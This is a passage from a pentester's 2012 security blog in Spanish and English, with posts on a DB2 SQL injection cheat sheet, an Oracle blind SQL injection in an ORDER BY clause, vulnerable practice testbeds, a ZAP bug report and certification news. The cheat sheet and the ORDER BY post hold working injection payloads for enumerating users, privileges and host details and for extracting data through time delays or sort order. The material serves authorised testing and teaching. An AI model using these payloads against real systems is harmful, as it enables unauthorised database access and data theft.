Security et alii

DB2 SQL injection cheat sheet

Adrián — Mon, 21 May 2012 18:02:49 +0000

Note: There is an English version of this post here.

Estoy seguro de que todos nosotros (pentesters) usamos bastante los cheat sheets sobre inyección SQL de pentestmonkey. Se han convertido en una referencia cuando se trata de realizar inyecciones SQL, y hay que decir que la mayor parte de las veces solucionan el problema. Sin embargo, los cheat sheets de DB2 son de los menos completos de la web. Quizá porque no es un motor de bases de datos muy extendido, además the ser bastante complejo. Tanto en el trabajo anterior como en este he tenido la ¿suerte? de toparme con muchos sistemas ejecutando DB2, de ahí que la información que faltaba fuera un tanto molesta.

A continuación tenéis una tabla con un cheat sheet actualizado para inyecciones SQL en DB2, basado en el de pentestmonkey. Los campos actualizados o modificados o simplemente de nueva creación, están marcados con un asterisco (*). Todas estas consultas han sido probadas en un Win32+DB2 v10.1.0, aunque he tenido la oportunidad de probar algunas en Z/OS+DB2 v9.x and v8.x y la mayoría funcionan bien. Tened en cuenta que no soy un experto en DB2, por lo que si encontráis errores, o información inexacta, o si conocéis otros trucos, sentíos libres de contactarme. Por último, he subido unos dumps de privilegios por defecto, tablas con acceso para PUBLIC y otra información interesante sobre DB2.

Versión*
	select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
	select getvariable(‘sysibm.version’) from sysibm.sysdummy1 — (v8+)
	select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
	select service_level,bld_level from sysibmadm.env_inst_info
Comentarios	select blah from foo — se comenta así (doble guión)
Usuario Actual
	select user from sysibm.sysdummy1
	select session_user from sysibm.sysdummy1
	select system_user from sysibm.sysdummy1
Listar Usuarios*
	DB2 usa cuentas del SO. Las que tienen acceso a DB2 pueden obtenerse así:
	select distinct(authid) from sysibmadm.privileges — necesita privilegios
	select grantee from syscat.dbauth — resultados incompletos
	select distinct(definer) from syscat.schemata — más exacta
	select distinct(grantee) from sysibm.systabauth — igual que la anterior
Listar Hashes de Contraseñas	N/A (Usuarios del SO)
Listar Privilegios
	select * from syscat.tabauth — muestra los privilegios sobre tablas
	select * from syscat.tabauth where grantee = current user — shows privs for current user
Listar cuentas DBA (Admin)*	select distinct(grantee) from sysibm.systabauth where CONTROLAUTH=’Y’
Base de datos Actual	select current server from sysibm.sysdummy1
Listar Bases de datos*	select distinct(table_catalog) from sysibm.tables
Listar Columnas*	select name, tbname, coltype from sysibm.syscolumns — also valid syscat and sysstat
Listar Tablas
	select table_name from sysibm.tables
	select name from sysibm.systables
Encontrar Tablas a partir de nombre de Columna	select tbname from sysibm.syscolumns where name=’username’
Seleccionar la N-esima fila*	select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
Seleccionar el N-esimo Caracter	select substr(‘abc’,2,1) FROM sysibm.sysdummy1 — returns b
Operadores binarios AND/OR/NOT/XOR*	select bitand(1,0) from sysibm.sysdummy1 — devuelve 0. También disponibles bitandnot, bitor, bitxor, bitnot
Código ASCII -> Char	select chr(65) from sysibm.sysdummy1 — devuelve ‘A’
Char -> Código ASCII	select ascii(‘A’) from sysibm.sysdummy1 — devuelve 65
Conversión
	select cast(’123′ as integer) from sysibm.sysdummy1
	select cast(1 as char) from sysibm.sysdummy1
Concatenar Cadenas
	select ‘a’ concat ‘b’ concat ‘c’ from sysibm.sysdummy1 — devuelve ‘abc’
	select ‘a’ \|\| ‘b’ from sysibm.sysdummy1 — devuelve ‘ab’
Sentencia IF*	Parece que sólo se permite en procedimientos almacenados. Utilizar CASE en su lugar.
Case Statement*	select CASE WHEN (1=1) THEN ‘AAAAAAAAAA’ ELSE ‘BBBBBBBBBB’ END from sysibm.sysdummy1
Evitar Comillas*	SELECT chr(65)\|\|chr(68)\|\|chr(82)\|\|chr(73) FROM sysibm.sysdummy1 — devuelve “ADRI”. Funciona sin el select también.
Time Delay*
	Consultas pesadas, por ejemplo:
	‘ and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 — Si el nombre de usuario empieza con el ascii 68 (‘D’), la consulta pesada se ejecutará, retrasando la respuesta. Sin embargo, si el usuario no empieza por el ascii 68, la consulta no se ejecutará y la respuesta será más rápida.
Serializar a XML (para extracción por errores)*
	select xmlagg(xmlrow(table_schema)) from sysibm.tables — devuelve todo en una sola cadena formateada en XML (v9 y v10)
	select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) — Igual pero sin elementos repetidos. (v9 y v10)
	select xml2clob(xmelement(name t, table_schema)) from sysibm.tables — devuelve todo en una sola cadena formateada en XML (v8). Quizá necesite CAST(xml2clob(… AS varchar(500)) para ver el resultado.
Hacer Peticiones DNS	N/A
Ejecución de Comandos	Parece que sólo está permitido desde procedimientos almacenados o funciones de usuario (UDFs).
Local File Access	Creo que esto sólo está disponible a través de procedimientos almacenados o el comando db2
Hostname/IP e Info del OS*	select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info — requiere privilegios
Localización de los ficheros de la BD*	select * from sysibmadm.reg_variables where reg_var_name=’DB2PATH’ — require privilegios
Config. del Sistema*
	select dbpartitionnum, name, value from sysibmadm.dbcfg where name like ‘auto_%’ — Require privilegios. Devuelve todos los parámetros de configuración de la base de datos almacenados en memoria para todas las particiones de la DB.
	select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg — Require privilegios. Devuelve todos los valores de configuración de la base de datos almacenados en disco para todas las particiones de la DB.
BBDD por defecto*	Lo que tiene sentido para DB2 es conocer esquemas por defecto (y quizá tablas): SYSIBM/SYSCAT/SYSSTAT/SYSPUBLIC/SYSIBMADM/SYSTOOLS

DB2 SQL injection cheat sheet

Adrián — Sun, 20 May 2012 13:49:03 +0000

Nota: Hay una versión de esta entrada en Español aquí.

I’m sure we all (pentesters) make extensive use of pentestmonkey’s SQL injection cheat sheets. They are touchstones when it comes down to SQL injection, and most of the time they save the day. However, DB2 cheat sheet is one of the less complete in pentestmonkey’s website. It might be because it’s not a very common database engine and a fairly complex one. I’ve had the luck? of coming across lot’s of DB2 systems in my last and also in my current job. Hence the missing information was extremely annoying.

Following this lines there is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkey’s as starting point. The updated/modified or new fields are marked with an asterisk (*). All of these queries have been tested on a Win32+DB2 v10.1.0, although I’ve also had the chance to test some on Z/OS+DB2 v9.x and v8.x and most of them work fine. Please note that I’m not a DB2 expert, so If you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, I’ve uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.

Version*
	select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
	select getvariable(‘sysibm.version’) from sysibm.sysdummy1 — (v8+)
	select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
	select service_level,bld_level from sysibmadm.env_inst_info
Comments	select blah from foo — comment like this (double dash)
Current User
	select user from sysibm.sysdummy1
	select session_user from sysibm.sysdummy1
	select system_user from sysibm.sysdummy1
List Users*
	DB2 uses OS accounts. Those with DB2 access can be retrieved with:
	select distinct(authid) from sysibmadm.privileges — priv required
	select grantee from syscat.dbauth — incomplete results
	select distinct(definer) from syscat.schemata — more accurate
	select distinct(grantee) from sysibm.systabauth — same as previous
List Password Hashes	N/A (OS User Accounts)
List Privileges
	select * from syscat.tabauth — shows priv on tables
	select * from syscat.tabauth where grantee = current user — shows privs for current user
List DBA Accounts*	select distinct(grantee) from sysibm.systabauth where CONTROLAUTH=’Y’
Current Database	select current server from sysibm.sysdummy1
List Databases*	select distinct(table_catalog) from sysibm.tables
List Columns*	select name, tbname, coltype from sysibm.syscolumns — also valid syscat and sysstat
List Tables
	select table_name from sysibm.tables
	select name from sysibm.systables
Find Tables From Column Name	select tbname from sysibm.syscolumns where name=’username’
Select Nth Row*	select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
Select Nth Char	select substr(‘abc’,2,1) FROM sysibm.sysdummy1 — returns b
Bitwise AND/OR/NOT/XOR*	select bitand(1,0) from sysibm.sysdummy1 — returns 0. Also available bitandnot, bitor, bitxor, bitnot
ASCII Value -> Char	select chr(65) from sysibm.sysdummy1 — returns ‘A’
Char -> ASCII Value	select ascii(‘A’) from sysibm.sysdummy1 — returns 65
Casting
	select cast(’123′ as integer) from sysibm.sysdummy1
	select cast(1 as char) from sysibm.sysdummy1
String Concat
	select ‘a’ concat ‘b’ concat ‘c’ from sysibm.sysdummy1 — returns ‘abc’
	select ‘a’ \|\| ‘b’ from sysibm.sysdummy1 — returns ‘ab’
IF Statement*	Seems only allowed in stored procedures. Use case logic instead.
Case Statement*	select CASE WHEN (1=1) THEN ‘AAAAAAAAAA’ ELSE ‘BBBBBBBBBB’ END from sysibm.sysdummy1
Avoiding Quotes*	SELECT chr(65)\|\|chr(68)\|\|chr(82)\|\|chr(73) FROM sysibm.sysdummy1 — returns “ADRI”. Works without select too
Time Delay*
	Heavy queries, for example:
	‘ and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 — If user starts with ascii 68 (‘D’), the heavy query will be executed, delaying the response. However, if user doesn’t start with ascii 68, the heavy query won’t execute and thus the response will be faster.
Serialize to XML (for error based)*
	select xmlagg(xmlrow(table_schema)) from sysibm.tables — returns all in one xml-formatted string
	select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) — Same but without repeated elements
	select xml2clob(xmelement(name t, table_schema)) from sysibm.tables — returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
Make DNS Requests	N/A
Command Execution	Seems it’s only allowed from procedures or UDFs.
Local File Access	I think this is only available through stored procedures or db2 tool.
Hostname/IP and OS INFO*	select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info — requires priv
Location of DB Files*	select * from sysibmadm.reg_variables where reg_var_name=’DB2PATH’ — requires priv
System Config*
	select dbpartitionnum, name, value from sysibmadm.dbcfg where name like ‘auto_%’ — Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
	select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg — Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
Default System Databases*	What makes sense for DB2 is to know default System Schemas (and maybe tables): SYSIBM/SYSCAT/SYSSTAT/SYSPUBLIC/SYSIBMADM/SYSTOOLS

Un 10 para OWASP ZAP (apología del software libre)

Adrián — Sat, 12 May 2012 11:41:17 +0000

Quería dedicar una entrada a elogiar la estupenda respuesta del equipo de desarrollo de OWASP ZAP, y que sirva de ejemplo de cómo el software libre no supone un handicap para las empresas. Si bien yo recomiendo siempre que, si una empresa utiliza una herramienta de software libre como pieza clave de su trabajo diario, se involucre en el desarrollo o mantenimiento de la misma, el caso es que hay proyectos de software libre que tienen unos tiempos de respuesta mejores que muchas empresas de software.

La historia es ésta. Esta semana he encontrado un bug en OWASP ZAP 1.4.0.1 mientras trabajaba que, por su gravedad, me llevó a reportarlo inmediatamente (una vez verificado). El problema en cuestión era que cuando el usuario modificaba un parámetro de una petición POST, la cabecera Content-Length no se actualizaba apropiadamente, por lo que el contenido de la petición llegaba cortado al servidor web, dando lugar a comportamientos más que extraños. El caso es que llevaba notando cosas raras unos días, pero coincidió con las pruebas de una nueva aplicación web, y al principio pensé que era la aplicación la que tenía un comportamiento anormal. La versión 1.4.0.1 se publicó el 9 de Abril de 2012, por lo que presumiblemente todos los usuarios de esa versión durante el último mes han estado padeciendo éste problema sin saberlo.

Pues bien, reporté el problema en el issue tracker de ZAP con el id 298 a la hora de la comida, y avisé al mismo tiempo a mis compañeros de trabajo, ya que se hacía conveniente revisar los resultados del trabajo de las últimas semanas. Volví a mi trabajo encadenando la versión gratuita de Burp con ZAP para evitar el bug. Mientras, recurrí a la guía de Taddong “Building OWASP ZAP with Eclipse (v2.0)” y comencé la descarga del IDE, Subversion para Windows, y todo lo necesario para echar un ojo e intentar averiguar dónde y cómo solucionar el problema. Sin embargo, apenas había terminado de montar el entorno y hacerme una idea rápida de cómo iban los módulos y clases cuando me llegó un correo de nuevo comentario en el hilo del tracker. ¡El parche había sido subido al repositorio y un .jar con el fallo corregido estaba disponible para la descarga en el hilo del problema! Tiempo total desde que reporté el fallo hasta que se subió la solución: ¡3 horas!

Por cierto, para aquellos que no lo sepan, ZAP no es Burp, pero se acerca muy rápido. En mi opinión, si Burp no se pode las pilas es probable que en el plazo de un año o dos ZAP sea mucho más útil para el pentester que Burp.

¡Salud!

SQLol y XMLmao: Web hacking Testbeds

Adrián — Tue, 08 May 2012 18:07:19 +0000

Recientemente tuve que preparar unas presentaciones sobre XPath Injection (I,II) a modo de formación interna en la empresa, y me puse a buscar entornos en los que se pudieran practicar las técnicas que iba a contar. El caso es que la mayoría de entornos “conocidos”, como WebGoat, DVWA, Multillidae, AltoroMutual… tienen uno o ningún nivel dedicado a XPath Injection. Con la intención de que los alumnos pudieran jugar un poco más, estuve indagando en Google, y encontré XMLmao.

XMLmao

XMLmao es un entorno vulnerable a XPath Injection y XML Injection que permite probar gran variedad de ataques diferentes. Está construido de tal forma que se puede elegir si hay filtro de comillas, de barras (/), de pipes (|), de espacios o de brackets ([). También se puede configurar el punto de inyección: Ruta del nodo, Nombre del nodo, Variable de condición, Valor numérico en la condición, cadena en la condición, Nodo Hijo o query completa. Permite seleccionar si se mostrarán todos los resultados, sólo uno, ninguno, o tan sólo un comportamiento diferente entre resultados y no (para blind injection).

Eso en cuanto a XPath Injection. La sección de XML Injection tiene configuraciones muy similares. Además de todo lo anterior, la aplicación consta de una serie preestablecida de "desafíos" para superar utilizando diferentes técnicas de inyección. Por si alguno se atasca con los desafíos, en la misma carpeta en la que se encuentran los .php que los contienen están también los .txt que explican una posible solución al reto.

El entorno está escrito en PHP, y su instalación es tan sencilla como descargar un .zip (de aquí) y extraerlo en la carpeta del servidor web (/var/www/XMLmao en mi caso). Como la aplicación es deliberadamente vulnerable, no se recomienda su instalación en servidores públicos (o al menos no sin algún tipo de autenticación).

SQLol

Al trastear con el repositorio de SpiderLabs, descubrí otro proyecto de características similares pero orientado a las inyecciones SQL. No es que de este tipo de ataque no haya entornos de prueba (que los hay, y muchos), pero me sigue pareciendo muy interesante que permita al usuario configurar los parámetros de inyección de acuerdo a sus inquietudes en ese momento.

Pantalla Principal SQLol

Del mismo modo que XMLmao, permite configurar el nivel de filtrado, qué caracteres están siendo filtrados, si se muestra la consulta, el nivel de verbosidad de los errores y el lugar en el que se encuentra la inyección. Así por ejemplo, puedes probar inyecciones en los siguientes sitios:

Opciones de Inyección

Por supuesto, también se puede elegir el tipo de consulta en el que se va a inyectar (DELETE, UPDATE, SELECT, INSERT o CUSTOM). Consta de una serie de retos predefinidos con sus respectivas soluciones para aquel que se atasque con alguno. La instalación es similar a la de XMLmao, descargar el .zip (de aquí) y descomprimir en la carpeta del servidor web. Sin embargo, SQLlol requiere una base de datos SQL. Soporta MySQL, Postgres y SQLite, aunque el desarrollador comenta que puede que otras funcionen. Una vez descomprimido el paquete, es necesario modificar el fichero #SQLol_directory/includes/database.config.php para que haga referencia a la base de datos que hayamos instalado. Al finalizar este paso, nos dirigimos a la interfaz web y pulsamos en el botón “RESET”, y listo.

Espero que éstos entornos “menos conocidos” os sirvan para practicar éste tipo de ataques o para replicar de manera más precisa el escenario que os podáis encontrar durante un pentest.

¡Salud!

Montar las Imágenes de exploit-exercises.com en VMware Fusion

Adrián — Sat, 28 Apr 2012 12:02:43 +0000

Quería dejar un pequeño apunte para aquellos que estén interesados en probar los retos de exploit-exercises.com. Desde dicha web proporcionan tres máquinas virtuales con diferentes niveles de exploiting para practicar y mejorar las técnicas y conocimientos relativos: Nebula, Protostar y Fusion. El proyecto empezó hace tiempo, pero tanto Protostar como Fusion siguen en estado aplha/beta. Personalmente, preferí esperarme a que los entornos de pruebas fueran más estables para asegurarme de que los problemas que encuentre sean debidos al ejercicio en sí (y/o a mi torpeza) y no a posibles bugs. El primer entorno de pruebas, Nebula, va por la versión 4 y debería ser suficientemente estable, así que decidí bajarlo y echar un rato jugando con las pruebas.

En éste link dan instrucciones para importar las máquinas virtuales de pruebas que proveen en formato OVA (Open Virtualization Format). El problema es que no hay tutorial para VMware Fusion, y no carga OVAs directamente. No es que sea un proceso complicado, pero ahí va:

Descargar OVFTool de la web de VWmare e instalar siguiendo el procedimiento habitual en OS X
Descargar la imagen OVA de la web de exploit-exercises.com
Desde una terminal, ejecutar los siguientes comandos:

Convertir imagen con ovftool --lax origen.ova destino

Si os olvidáis de incluir el flag –lax dará un error relacionado con virtualbox-2.2 (que no nos incumbe) y finalizará. Cuando termine (tarda unos minutos), simplemente id a VMware Fusion, “Archivo->Abrir” y seleccionad la imagen que habéis creado.

Archivo->Abrir

Con esto debería bastar, podéis arrancar la máquina y entrar con usuario y password levelXX. Tenéis más información sobre el funcionamiento y los niveles de Nebula en la página oficial.

¡Salud!

¿Sueño con ovejas eléctricas?

Adrián — Fri, 13 Apr 2012 19:07:41 +0000

Sí, me temo que soy un replicante, un androide con forma humanoide, un cascarón de piel sintética sobre cables y circuitería varia. Para aquellos no muy dedicados a la literatura, el título del relato de Philip K. Dick que dio lugar a la película Blade Runner, se titulaba originalmente “Do Androids Dream of Electric Sheep?”

¿Y por qué digo esto? Porque cada vez más, se da la situación de que me ven enfrente de un captcha que no puedo resolver. ¿Y no es el objetivo de los captchas dejar fuera a los autómatas y permitir su resolución a los seres humanos? Mi tasa de acierto debe ser aproximadamente del 66%, fallo un tercio de los captchas al menos (lo sé, lamentable).

En fin, sé que esto no os interesa mucho, pero lo que os voy a decir a continuación seguro que sí: vosotros tampoco sois humanos. ¿Qué? ¿Qué no os lo creéis? Vale, pues decidme cual es la solución a éste captcha de uploaded.to:

Captcha indescifrable

¡Salud!

Advanced XPath Injection

Adrián — Tue, 10 Apr 2012 19:27:19 +0000

Quería actualizar brevemente con la segunda parte de la presentación sobre XPath Injection (en inglés) que he dado en la empresa para los menos avezados en el tema. El título “avanzado” quizá sea decir mucho, pero tiene algunos trucos, incluyendo blind, que no estaban incluídos en la primera presentación por motivos de espacio.

Dicho esto, podéis descargar el PPT de aquí.

¡Salud!

Oracle Blind SQL Injection en Order By

Adrián — Mon, 26 Mar 2012 20:03:27 +0000

Hoy quería comentar un caso curioso que me he encontrado recientemente durante un pentest de una aplicación web. La aplicación en cuestión es muy grande, con muchísimos menús, submenús, cantidad de roles, checkboxes y dropdown menus que muestran diferentes páginas en función de los valores que tengan… Vamos, una cosa incómoda de manejar y con muchos campos donde intentar inyectar basurilla. Y además, no está permitido el uso de herramientas automáticas (requisitos del cliente).

Lo más habitual suele ser que una web sea vulnerable a SQL injection en todos los campos del mismo tipo, o del mismo formulario, existiendo siempre la posibilidad de que un cambio de desarrollador o un parche a posteriori deje un agujero que no estaba previamente. La aplicación de la que os hablo hoy es de este tipo, una aplicación antigua que ha pasado por las manos de varios desarrolladores y sobre la que se han aplicado parches y añadido nuevas funcionalidades con el paso del tiempo. Pues allá que iba yo auditando la susodicha, llevando recorrido ya más de un 75% de la web sin haber sido capaz de encontrar ningún SQLi. Y fue en aquel preciso momento, desvanecida ya toda esperanza, ~~cuando Isildur, Hijo del Rey recurrió a la espada de su padre…~~ cuando me topé con la típica tabla que se puede ordenar clickando en los encabezados de las columnas. Algo muy parecido a esto:

Tabla ordenable

Si echamos un vistazo a lo que sucede cuando hacemos click en “1 Year”, lo que nos mostrará Burp nos parecerá bastante sospechoso, y será muy parecido a lo siguiente:

Llegados a este punto, no queda más remedio que intentar una inyección en esos parámetros, a pesar de que existían otras tablas de la aplicación con aspecto idéntico, e idénticos nombres de parámetros que no eran inyectables. Para llevar a cabo esta tarea hay que tener en cuenta un par de peculiaridades sobre las inyecciones en cláusulas Order By, y en Oracle. A saber:

No es necesario el uso de comillas: En la cláusula Order By se colocan directamente los nombres de las columnas de la tabla sin necesidad de comillas, por lo que no hará falta para la inyección cerrar comillas previamente abiertas.
No está permitido el uso de UNION: SQL no permite el uso de UNION en la cláusula Order By (tampoco tendría mucho sentido), por lo que no podremos usar ésta técnica para extraer información.
Oracle no permite SELECT sin su correspondiente FROM, por lo que para seleccionar consultas se ha de utilizar la tabla dummy llamada dual.
Lo mismo da ordenar por una columna por nombre (ORDER BY Year) que por posición (ORDER BY 1).

Esto provoca que muchos programadores piensen que no es posible inyectar en cláusulas ORDER BY, y descuidan la debida validación de la entrada de usuario para estos casos. Como siempre, lo primero que a uno se le ocurre es meter unas comillas, y ver si la aplicación responde con un error maravilloso denotando que es vulnerable (y facilitando la posterior extracción de datos, ya que no podremos usar UNION). Por desgracia (para mí), las comillas simplemente devolvían la tabla ordenada de la misma forma que se muestra en la primera imagen, es decir, sin orden aparente. El mismo resultado se produce si en lugar de “Year”, utilizamos como valor “España” o “Manolito”. Hasta aquí podría parecer que no es vulnerable, y que quizá el JSP de la página haga un “switch” y cree la query a la base de datos sin los valores que estamos manipulando. En ese caso, sería posible que la rama default del switch hiciera la query sin ordenar, algo así:


switch (Sort_by){
case "Year":
query+="ORDER BY Year;";
break;
case "Month":
query+="ORDER BY Month;";
break;
default:
query+=";"
break;
}

Por suerte para nosotros, no es el caso. Lo era en ésta misma aplicación, en tablas anteriores, pero se les olvidó una; y con una basta. La pista la da que si en lugar de SortBy=”Year”, enviamos SortBy=1, la tabla se ordena como esperamos, por lo que o el switch cubre muchos casos, o aquí tenemos algo para jugar.

Si repasamos un poco nuestro escenario, tenemos una inyección ciega en un campo ORDER BY en Oracle. Al ser un caso de blind SQLi, no nos queda más remedio que tratar de construir algún tipo de lógica binaria para diferenciar aciertos de errores en las consultas. Probablemente, lo primero que os venga a la cabeza sea construir una consulta que ordene por la primera columna si el resultado es True, y por la segunda si es False. Como ejemplo, vamos a construir dicha query para obtener el primer caracter del usuario con el que corre la instancia de Oracle. Paso a paso:

Select user from dual -- Obtiene el usuario de la instancia de Oracle, utilizando la dummy table dual.

case WHEN (1=1) THEN 1 ELSE 2 END -- Devuelve 1 si (1=1) es True, y 2 en otro caso.

ascii(substr(user,1,1)) -- Devuelve el valor ascii del primer caracter de "user"

Sort_by=(SELECT case WHEN ascii(substr(user,1,1))=80 then 1 else 2 end from (SELECT user from dual)) -- Obtiene el usuario de la tabla dummy dual. De ese string, saca el primer caracter y lo convierte a ascii. Si ese valor es igual a 80, devuelve 1 (ordenando por la primera columna) y si no, devuelve 2 (ordenando por la segunda).

También se podría haber hecho la query de la siguiente forma (por si a alguien le es más fácil de ver):

(case WHEN ascii(substr(SELECT user FROM dual,1,1))=80 then 1 else 2 end)

Conseguido esto sólo queda iterar por los valores de la tabla ascii para conseguir el nombre completo del usuario, o usar la misma idea para obtener las tablas, bases de datos o contenido de las mismas.

Hay dos conclusiones que extraer de esta pequeña entrada. La primera, que a pesar de que parezca que no se va a encontrar un fallo en una aplicación, hay que seguir probando todos los campos hasta el final, porque puede haber sorpresas. La segunda, que las inyecciones en ORDER BY, no sólo son posibles, sino que son muy efectivas, porque habitualmente no están filtradas por los desarrolladores.

Cualquier cosa, me encantará un comentario.

Salud

Achievement Unlocked: SANS GIAC GPEN

Adrián — Wed, 21 Mar 2012 23:00:32 +0000

Quería poner una pequeña actualización para comentar que hoy hice el examen del GPEN y que ya estoy oficialmente certificado por GIAC. He estado apurando la fecha hasta el último día (sí, me gusta vivir al límite) porque con el cambio de trabajo y residencia se me complicaron las cosas. El centro estaba un poco en ruinas y hacía algo de frío, pero posiblemente es porque se estaban instalando en la nueva oficina. Además, me quedaba a tres horas en coche (sigh).

Sobre el examen, decir que sigue la tónica de los test de prácticas, pero apenas se repite ninguna pregunta. El nivel de dificultad es similar, aunque hay que sumarle obviamente la presión del examen “real”. El examen es “open book”, lo que quiere decir que puedes llevar los libros, y cualquier otro apunte que creas que puede serte útil. Cabe decir que, a pesar de que se tienen tan sólo 4 horas para responder 150 preguntas, con un buen índice que te permita encontrar rápidamente las preguntas que no tienes claras, sobra tiempo para completarlo sin prisas.

Dicho esto, obtuve un resultado del 95,33%, más que suficiente para aprobar y sentirme orgulloso del resultado. No habría podido obtener éste resultado tan positivo si no hubiera sido por la excelente labor de Mentor que hicieron Jose Selvi y Rafa Alfaro durante las semanas que duró el curso en Madrid. Los dos dieron unas clases estupendas, se lo curraron muchísimo con el CTF del final y con las explicaciones, además de dar un gran soporte durante el curso.

A tenor del curso, y del contenido de la certificación, estoy muy satisfecho con el temario y creo que es realmente útil para el trabajo diario. El apartado de leyes queda un poco fuera de lugar, pero por lo demás merece la pena, sobretodo si no tienes muchos años de experiencia como pentester. Aún así, creo que incluso la gente con más experiencia podría aprender algún truquillo nuevo. Y aunque no es ni de lejos lo más interesante, debo admitir que la parte sobre la escritura de informes me ha resultado útil.

Por último, darle las gracias a Miguel López, compañero durante el curso, que amablemente me cedió uno de sus tests de prácticas. Si todo va como está previsto, creo que me apuntaré al GXPN en algún momento de 2012. Quería cerrar el post con una promesa: actualizar más a menudo este año

¡Salud!

XPath Injection Primer

Adrián — Thu, 23 Feb 2012 18:16:41 +0000

Edit: He publicado una segunda parte de este tema aquí.

Estos días he preparado una presentación introductoria (en inglés) sobre XPath Injection para dar como formación interna en la empresa, ya que hay gente nueva que no tiene mucha experiencia. No cubre aspectos avanzados pero sí que comienza con una introducción sobre XML y sobre XPath, para después entrar en el tema de XPath Injection. Quizá para la próxima incluya Blind XPath injection y algunos truquillos más, pero por el momento os dejo el powerpoint introductorio que para aquellos que no sepan mucho del tema les vendrá bien.

Para descargarlo podéis pinchar aquí.

¡Salud!